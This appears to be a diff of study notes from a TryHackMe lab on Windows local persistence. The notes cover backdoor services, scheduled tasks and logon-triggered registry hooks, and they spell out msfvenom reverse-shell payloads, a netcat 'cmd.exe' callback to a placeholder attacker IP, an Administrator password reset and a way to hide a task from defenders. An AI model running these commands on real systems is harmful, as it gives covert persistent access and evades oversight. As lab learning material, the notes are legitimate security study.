ziadhamdy88/THM/Notes/Windows Local Persistence.md

 			`C:\Windows\System32\NOTEPAD.EXE $args[0]`
 		- Set the Data column should contain `powershell -windowstyle hidden C:\Windows\System32\backdoor2.ps1 %1`.
 		- Create a listener to catch the reverse shell.
+- ## *Abusing Services*
+	- Windows services is a great way to establish persistence since they can run in the background whenever the victim machine is started.
+	- When configuring a service, you define which executable will be used and select if the service will automatically run when the machine starts or should be manually started.
+	- #### *Creating Backdoor Services*
+		- Create and start a new service called `THMservice` using `sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto` and `sc.exe start THMservice`. **NOTE: The space after the equal sign**
+		- This resets the administrator's password to `Passwd123`.
+		- Another way is to create a reverse shell using `msfvenom` and associate it with the created service.
+Notice that service executables are unique, they implement certain protocol to be handled by the system.
+		- Create an executable that is compatible with Windows services using the `exe-service` format, `msfvenom -p windows/x64/shell_reverse_tcp lhost=<attacker-ip> lport=4448 -f exe-service -o rev-svc.exe`.
+		- Transfer the executable to the target system and point the service's `binPath` to it, `sc.exe create THMservice2 binPath= "C:\Windows\rev-svc.exe" start= auto` then `sc.exe start THMservice2`.
+	- #### *Modifying Existing Services*
+		- Since the blue team might monitor new service creation across the network, we might want to reuse an existing service instead of creating one to avoid detection.
+Usually, any disabled service is a good candidate.
+		- List available services using `sc.exe query state=all`.
+		- Find a stopped service and query its configuration using `sc.exe qc <service-name>`.
+		- Three things to care about using a service
+			- The executable `BINARY_PATH_NAME` which should point to our payload.
+			- The service `START_TYPE` should be automatic so that it runs without interaction.
+			- The `SERVICE_START_NAME` which is the account that the service runs with, should preferably be set to `LocalSystem`.
+		- Create a reverse shell using `msfvenom -p windows\x64\shell_reverse_tcp lhost=<attacker-ip> lport=5558 -f exe-service -o rev-svc2.exe`.
+		- Transfer the executable.
+		- Reconfigure the service using `sc.exe config THMservice3 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"`.
+		- Query service's configuration again to check using `sc.exe qc THMservice3`.
+		- Stop and start the service to catch the reverse shell.
+- ## *Abusing Scheduled Tasks*
+	- #### *Task Scheduler*
+		- The most common way to schedule tasks is with this built-in scheduler.
+Allows for granular control, tasks that activate at specific time, repeat periodically or even triggered by an event.
+		- Use `schtasks` to list the scheduled tasks.
+		- Create a task that runs a reverse shell every minute, in a real scenario this shouldn't be done so often.
+		- `schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64.exe -e cmd.exe <attacker-ip> 4449" /ru SYSTEM`.
+		- This command creates a `THM-TaskBackdoor` task and executes `nc64` reverse shell back to  the attacker, the `/sc` and `/mo` specifies that the task runs every minute, and `/ru` option indicates that the task runs as SYSTEM.
+		- Check the created task using `schtasks /query /tn thm-taskbackdoor`.
+		- **Making the Task Invisible**
+			- Deleting its Security Descriptor (SD) makes it invisible to any user in the system.
+			- Security Descriptors are saved in `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\`.
+			- Using `PsExec64.exe -s -i regedit` to open Regedit as SYSTEM, and delete the SD key of the task.
+			- If we try to query the service again, it shouldn't be found.
+- ## *Logon Triggered Persistence*
+	- Some actions performed by a user might be bound to executing specific payloads for persistence.
+Windows present several ways to link payloads with particular interactions.
+	- #### *Startup Folder*
+		- Each user has a folder under `C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup` where you can put executables to be run whenever the user logs in.
+		- If we want to force all users to run a payload when logging in, use the folder under `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`.
+		- Generate a reverse shell with `msfvenom -p windows/x64/shell_reverse_tcp lhost=<attacker-ip> lport=4450 -f exe -o revshell1.exe`.
+		- Transfer the payload to the target.
+		- Store the payload in `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp` folder.
+		- Logout and then log back in to receive the shell.
+	- #### *Run / RunOnce*
+		- Force a user to execute a program on logon via the registry.
+Instead of delivering the payload into a specific directory, use the following registry entries to specify applications to run at logon
+			- `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
+			- `HKCU\Software\Microsoft\Windwos\CurrentVersion\RunOnce`
+			- `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
+			- `HKLM\Software\Microsoft\Windwos\CurrentVersion\RunOnce`
+		- Registry entries under `HKCU` only apply to current user, and those under `HKLM` applies to everyone.
+		- Create a reverse shell using `msfvenom -p windows/x64/shell_reverse_tcp lhost=<attacker-ip> lport=4451 -f exe -o revshell2.exe`.
+		- Transfer the file to any location, like `C:\Windows\`.
+		- Create a `REG_EXPAND_SZ` registry entry type under `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`, with any name of our choosing and configure the Data to `C:\Windows\revshell2.exe`.
+		- Sign out of the current session and log back in to trigger the shell.
+	- #### *Winlogon*
+		- Another alternative to automatically start programs on logon.
+		- Winlogon is the component that loads the user profile right after authentication (among other things).
+		- It uses some registry keys under `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` that could be interesting to gain persistence
+			- `UserInit` points to `userinit.exe` which is in charge of restoring the user profile preferences.
+			- `shell` points to the system's shell, which is actually `explorer.exe`.
+		- **If we would replace any of the executables with a reverse shell, we would break the logon sequence, which isn't desired**
+		- Interestingly, you can append commands separated by commas, and Winlogon will process them all.
+		- Create a shell using `msfvenom -p windows/x64/shell_reverse_tcp lhost=<attacker-ip> lport=4452 -f exe -o revshell3.exe`.
+		- Transfer the file to any location, like `C:\Windows\`.
+		- We then alter either `shell` or `Userinit` in `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\`.
+		- Sign out and log back in to trigger the shell.
+	- #### *Logon Scripts*
+		- One of the things that `Userinit.exe` does while loading the user profile is to check for an environment variable called `UserInitMprLogonScript`.
+		- We can use this environment variable to assign a logon script to a user that will get run when logging in.
+The variable isn't set by default, so create it and assign any script to it.
+		- Every user has his own environment variable, so assign one for each if needed.
+		- Create a reverse shell using `msfvenom -p windows/x64/shell_reverse_tcp lhost=<attacker-ip> lport=4453 -f exe -o revshell4.exe`.
+		- Transfer the file to any location, like `C:\Windows\`.
+		- Create an environment variable from `HKCU\Environment` in the registry, use the `UserInitMprLogonScript` entry to point to our payload.
+		- Entry type `REG_EXPAND_SZ` and Data `C:\Windows\revshell4.exe`.
+		- Sign out and log back in to trigger the shell.